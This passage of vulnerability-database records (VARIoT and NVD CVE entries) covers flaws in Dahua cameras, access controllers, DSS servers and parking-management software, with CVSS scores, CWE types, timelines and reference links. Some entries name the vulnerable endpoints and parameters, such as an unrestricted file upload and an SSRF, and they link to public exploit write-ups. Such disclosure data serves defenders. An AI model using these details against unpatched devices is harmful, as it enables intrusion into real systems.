"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:asi7213x_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2021-09",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:asi7213x:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-30560"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Nozomi Networks reported these vulnerabilities to CISA.",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202206-2720"
}
],
"trust": 0.6
},
"cve": "CVE-2022-30560",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2022-30560",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2022-60683",
"impactScore": 4.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.2,
"impactScore": 5.2,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.4,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2022-30560",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2022-30560",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2022-60683",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202206-2720",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-60683"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-012804"
},
{
"db": "NVD",
"id": "CVE-2022-30560"
},
{
"db": "CNNVD",
"id": "CNNVD-202206-2720"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "When an attacker obtaining the administrative account and password, or through a man-in-the-middle attack, the attacker could send a specified crafted packet to the vulnerable interface then lead the device to crash. ipc-hdbw2431e-s-s2 firmware, ipc-hdbw2831e-s-s2 firmware, ipc-hdbw2230e-s-s2 firmware etc. Dahua Technology Co., Ltd There are unspecified vulnerabilities in the product.Information is obtained and service operation is interrupted (DoS) It may be in a state. Dahua IPC-HFW2XXX, etc. are all products of China Dahua (Dahua) company. Dahua IPC-HFW2XXX is an IP camera. Dahua IPC-HDBW2XXX is a series of cameras. Dahua ASI7XXXX is a series of face recognition access controller",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-30560"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-012804"
},
{
"db": "CNVD",
"id": "CNVD-2022-60683"
},
{
"db": "VULMON",
"id": "CVE-2022-30560"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2022-30560",
"trust": 3.9
},
{
"db": "JVNDB",
"id": "JVNDB-2022-012804",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2022-60683",
"trust": 0.6
},
{
"db": "ICS CERT",
"id": "ICSA-22-193-01",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202206-2720",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2022-30560",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-60683"
},
{
"db": "VULMON",
"id": "CVE-2022-30560"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-012804"
},
{
"db": "NVD",
"id": "CVE-2022-30560"
},
{
"db": "CNNVD",
"id": "CNNVD-202206-2720"
}
]
},
"id": "VAR-202206-2212",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-60683"
}
],
"trust": 1.39166665
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-60683"
}
]
},
"last_update_date": "2023-12-18T11:51:39.825000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for Denial of Service Vulnerabilities in Several Dahua Products",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/347711"
},
{
"title": "Multiple Dahua Product code issue vulnerability fixes",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=200882"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-60683"
},
{
"db": "CNNVD",
"id": "CNNVD-202206-2720"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "Lack of information (CWE-noinfo) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-012804"
},
{
"db": "NVD",
"id": "CVE-2022-30560"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.dahuasecurity.com/support/cybersecurity/details/1017"
},
{
"trust": 1.2,
"url": "https://cxsecurity.com/cveshow/cve-2022-30560/"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30560"
},
{
"trust": 0.6,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-22-193-01"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-60683"
},
{
"db": "VULMON",
"id": "CVE-2022-30560"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-012804"
},
{
"db": "NVD",
"id": "CVE-2022-30560"
},
{
"db": "CNNVD",
"id": "CNNVD-202206-2720"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2022-60683"
},
{
"db": "VULMON",
"id": "CVE-2022-30560"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-012804"
},
{
"db": "NVD",
"id": "CVE-2022-30560"
},
{
"db": "CNNVD",
"id": "CNNVD-202206-2720"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-08-31T00:00:00",
"db": "CNVD",
"id": "CNVD-2022-60683"
},
{
"date": "2022-06-28T00:00:00",
"db": "VULMON",
"id": "CVE-2022-30560"
},
{
"date": "2023-09-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2022-012804"
},
{
"date": "2022-06-28T14:15:08.087000",
"db": "NVD",
"id": "CVE-2022-30560"
},
{
"date": "2022-06-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202206-2720"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-08-31T00:00:00",
"db": "CNVD",
"id": "CNVD-2022-60683"
},
{
"date": "2022-06-28T00:00:00",
"db": "VULMON",
"id": "CVE-2022-30560"
},
{
"date": "2023-09-01T08:16:00",
"db": "JVNDB",
"id": "JVNDB-2022-012804"
},
{
"date": "2022-07-13T17:38:30.007000",
"db": "NVD",
"id": "CVE-2022-30560"
},
{
"date": "2022-07-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202206-2720"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202206-2720"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural \u00a0Dahua\u00a0Technology\u00a0Co.,\u00a0Ltd\u00a0 Product vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-012804"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202206-2720"
}
],
"trust": 0.6
}
}
CVE-2023-3836 (GCVE-0-2023-3836)
Vulnerability from nvd – Published: 2023-07-22 18:00 – Updated: 2024-08-02 07:08- CWE-434 - Unrestricted Upload
| URL | Tags |
|---|---|
| https://vuldb.com/?id.235162 | vdb-entrytechnical-description |
| https://vuldb.com/?ctiid.235162 | signaturepermissions-required |
| https://github.com/qiuhuihk/cve/blob/main/upload.md | exploit |
| Vendor | Product | Version | |
|---|---|---|---|
| Dahua | Smart Park Management |
Affected:
20230713
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T07:08:50.600Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"vdb-entry",
"technical-description",
"x_transferred"
],
"url": "https://vuldb.com/?id.235162"
},
{
"tags": [
"signature",
"permissions-required",
"x_transferred"
],
"url": "https://vuldb.com/?ctiid.235162"
},
{
"tags": [
"exploit",
"x_transferred"
],
"url": "https://github.com/qiuhuihk/cve/blob/main/upload.md"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Smart Park Management",
"vendor": "Dahua",
"versions": [
{
"status": "affected",
"version": "20230713"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "analyst",
"value": "qiuhui (VulDB User)"
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability classified as critical was found in Dahua Smart Park Management up to 20230713. This vulnerability affects unknown code of the file /emap/devicePoint_addImgIco?hasSubsystem=true. The manipulation of the argument upload leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-235162 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."
},
{
"lang": "de",
"value": "In Dahua Smart Park Management bis 20230713 wurde eine Schwachstelle entdeckt. Sie wurde als kritisch eingestuft. Betroffen ist eine unbekannte Verarbeitung der Datei /emap/devicePoint_addImgIco?hasSubsystem=true. Durch Manipulation des Arguments upload mit unbekannten Daten kann eine unrestricted upload-Schwachstelle ausgenutzt werden. Der Angriff kann \u00fcber das Netzwerk passieren. Der Exploit steht zur \u00f6ffentlichen Verf\u00fcgung."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
}
},
{
"cvssV3_0": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.0"
}
},
{
"cvssV2_0": {
"baseScore": 6.5,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-434",
"description": "CWE-434 Unrestricted Upload",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-10-24T06:25:47.211Z",
"orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"shortName": "VulDB"
},
"references": [
{
"tags": [
"vdb-entry",
"technical-description"
],
"url": "https://vuldb.com/?id.235162"
},
{
"tags": [
"signature",
"permissions-required"
],
"url": "https://vuldb.com/?ctiid.235162"
},
{
"tags": [
"exploit"
],
"url": "https://github.com/qiuhuihk/cve/blob/main/upload.md"
}
],
"timeline": [
{
"lang": "en",
"time": "2023-07-21T00:00:00.000Z",
"value": "Advisory disclosed"
},
{
"lang": "en",
"time": "2023-07-21T00:00:00.000Z",
"value": "CVE reserved"
},
{
"lang": "en",
"time": "2023-07-21T02:00:00.000Z",
"value": "VulDB entry created"
},
{
"lang": "en",
"time": "2023-08-15T21:58:00.000Z",
"value": "VulDB entry last update"
}
],
"title": "Dahua Smart Park Management unrestricted upload"
}
},
"cveMetadata": {
"assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"assignerShortName": "VulDB",
"cveId": "CVE-2023-3836",
"datePublished": "2023-07-22T18:00:05.786Z",
"dateReserved": "2023-07-21T20:50:50.266Z",
"dateUpdated": "2024-08-02T07:08:50.600Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-3121 (GCVE-0-2023-3121)
Vulnerability from nvd – Published: 2023-06-06 11:00 – Updated: 2024-08-02 06:48- CWE-918 - Server-Side Request Forgery
| URL | Tags |
|---|---|
| https://vuldb.com/?id.230800 | vdb-entrytechnical-description |
| https://vuldb.com/?ctiid.230800 | signaturepermissions-required |
| https://github.com/RCEraser/cve/blob/main/DaHua..md | exploit |
| Vendor | Product | Version | |
|---|---|---|---|
| Dahua | Smart Parking Management |
Affected:
20230528
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T06:48:07.341Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"vdb-entry",
"technical-description",
"x_transferred"
],
"url": "https://vuldb.com/?id.230800"
},
{
"tags": [
"signature",
"permissions-required",
"x_transferred"
],
"url": "https://vuldb.com/?ctiid.230800"
},
{
"tags": [
"exploit",
"x_transferred"
],
"url": "https://github.com/RCEraser/cve/blob/main/DaHua..md"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Smart Parking Management",
"vendor": "Dahua",
"versions": [
{
"status": "affected",
"version": "20230528"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "analyst",
"value": "RCEraser (VulDB User)"
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability has been found in Dahua Smart Parking Management up to 20230528 and classified as problematic. This vulnerability affects unknown code of the file /ipms/imageConvert/image. The manipulation of the argument fileUrl leads to server-side request forgery. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-230800. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."
},
{
"lang": "de",
"value": "In Dahua Smart Parking Management bis 20230528 wurde eine problematische Schwachstelle gefunden. Es geht um eine nicht n\u00e4her bekannte Funktion der Datei /ipms/imageConvert/image. Durch das Beeinflussen des Arguments fileUrl mit unbekannten Daten kann eine server-side request forgery-Schwachstelle ausgenutzt werden. Der Exploit steht zur \u00f6ffentlichen Verf\u00fcgung."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 3.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
}
},
{
"cvssV3_0": {
"baseScore": 3.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.0"
}
},
{
"cvssV2_0": {
"baseScore": 2.7,
"vectorString": "AV:A/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918 Server-Side Request Forgery",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-10-23T12:43:09.475Z",
"orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"shortName": "VulDB"
},
"references": [
{
"tags": [
"vdb-entry",
"technical-description"
],
"url": "https://vuldb.com/?id.230800"
},
{
"tags": [
"signature",
"permissions-required"
],
"url": "https://vuldb.com/?ctiid.230800"
},
{
"tags": [
"exploit"
],
"url": "https://github.com/RCEraser/cve/blob/main/DaHua..md"
}
],
"timeline": [
{
"lang": "en",
"time": "2023-06-06T00:00:00.000Z",
"value": "Advisory disclosed"
},
{
"lang": "en",
"time": "2023-06-06T00:00:00.000Z",
"value": "CVE reserved"
},
{
"lang": "en",
"time": "2023-06-06T02:00:00.000Z",
"value": "VulDB entry created"
},
{
"lang": "en",
"time": "2023-06-30T14:48:14.000Z",
"value": "VulDB entry last update"
}
],
"title": "Dahua Smart Parking Management image server-side request forgery"
}
},
"cveMetadata": {
"assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"assignerShortName": "VulDB",
"cveId": "CVE-2023-3121",
"datePublished": "2023-06-06T11:00:05.120Z",
"dateReserved": "2023-06-06T10:09:00.185Z",
"dateUpdated": "2024-08-02T06:48:07.341Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-45434 (GCVE-0-2022-45434)
Vulnerability from nvd – Published: 2022-12-27 00:00 – Updated: 2025-04-14 12:59- Allocation of Resources Without Limits or Throttling
- CWE-770 - Allocation of Resources Without Limits or Throttling
| Vendor | Product | Version | |
|---|---|---|---|
| n/a | DSS Professional, DSS Express, DHI-DSS7016D-S2/DHI-DSS7016DR-S2, DHI-DSS4004-S2 |
Affected:
V8.0.2, V8.0.4, V8.1
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T14:09:57.035Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://www.dahuasecurity.com/support/cybersecurity/details/1137"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2022-45434",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-04-14T12:59:05.995633Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "CWE-770 Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-04-14T12:59:11.203Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "DSS Professional, DSS Express, DHI-DSS7016D-S2/DHI-DSS7016DR-S2, DHI-DSS4004-S2",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "V8.0.2, V8.0.4, V8.1"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Some Dahua software products have a vulnerability of unauthenticated un-throttled ICMP requests on remote DSS Server. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could exploit the victim server to launch ICMP request attack to the designated target host."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-12-27T00:00:00.000Z",
"orgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
"shortName": "dahua"
},
"references": [
{
"url": "https://www.dahuasecurity.com/support/cybersecurity/details/1137"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
"assignerShortName": "dahua",
"cveId": "CVE-2022-45434",
"datePublished": "2022-12-27T00:00:00.000Z",
"dateReserved": "2022-11-14T00:00:00.000Z",
"dateUpdated": "2025-04-14T12:59:11.203Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-45433 (GCVE-0-2022-45433)
Vulnerability from nvd – Published: 2022-12-27 00:00 – Updated: 2025-04-14 13:05- Improper Access Control
- CWE-306 - Missing Authentication for Critical Function
| Vendor | Product | Version | |
|---|---|---|---|
| n/a | DSS Professional, DSS Express, DHI-DSS7016D-S2/DHI-DSS7016DR-S2, DHI-DSS4004-S2 |
Affected:
V8.0.2, V8.0.4, V8.1
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T14:09:57.038Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://www.dahuasecurity.com/support/cybersecurity/details/1137"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.7,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2022-45433",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-04-14T13:05:16.598801Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-306",
"description": "CWE-306 Missing Authentication for Critical Function",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-04-14T13:05:43.020Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "DSS Professional, DSS Express, DHI-DSS7016D-S2/DHI-DSS7016DR-S2, DHI-DSS4004-S2",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "V8.0.2, V8.0.4, V8.1"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Some Dahua software products have a vulnerability of unauthenticated traceroute host from remote DSS Server. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could get the traceroute results."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Improper Access Control",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-12-27T00:00:00.000Z",
"orgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
"shortName": "dahua"
},
"references": [
{
"url": "https://www.dahuasecurity.com/support/cybersecurity/details/1137"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
"assignerShortName": "dahua",
"cveId": "CVE-2022-45433",
"datePublished": "2022-12-27T00:00:00.000Z",
"dateReserved": "2022-11-14T00:00:00.000Z",
"dateUpdated": "2025-04-14T13:05:43.020Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-45432 (GCVE-0-2022-45432)
Vulnerability from nvd – Published: 2022-12-27 00:00 – Updated: 2025-04-14 13:08- Improper Access Control
- CWE-306 - Missing Authentication for Critical Function
| Vendor | Product | Version | |
|---|---|---|---|
| n/a | DSS Professional、DSS Express、DHI-DSS7016D-S2/DHI-DSS7016DR-S2、DHI-DSS4004-S2 |
Affected:
V8.0.2, V8.0.4, V8.1
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T14:09:56.985Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://www.dahuasecurity.com/support/cybersecurity/details/1137"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2022-45432",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-04-14T13:08:04.274952Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-306",
"description": "CWE-306 Missing Authentication for Critical Function",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-04-14T13:08:12.283Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "DSS Professional\u3001DSS Express\u3001DHI-DSS7016D-S2/DHI-DSS7016DR-S2\u3001DHI-DSS4004-S2",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "V8.0.2, V8.0.4, V8.1"
}
]
}
],
"descriptions": [
{
"lang": "en",
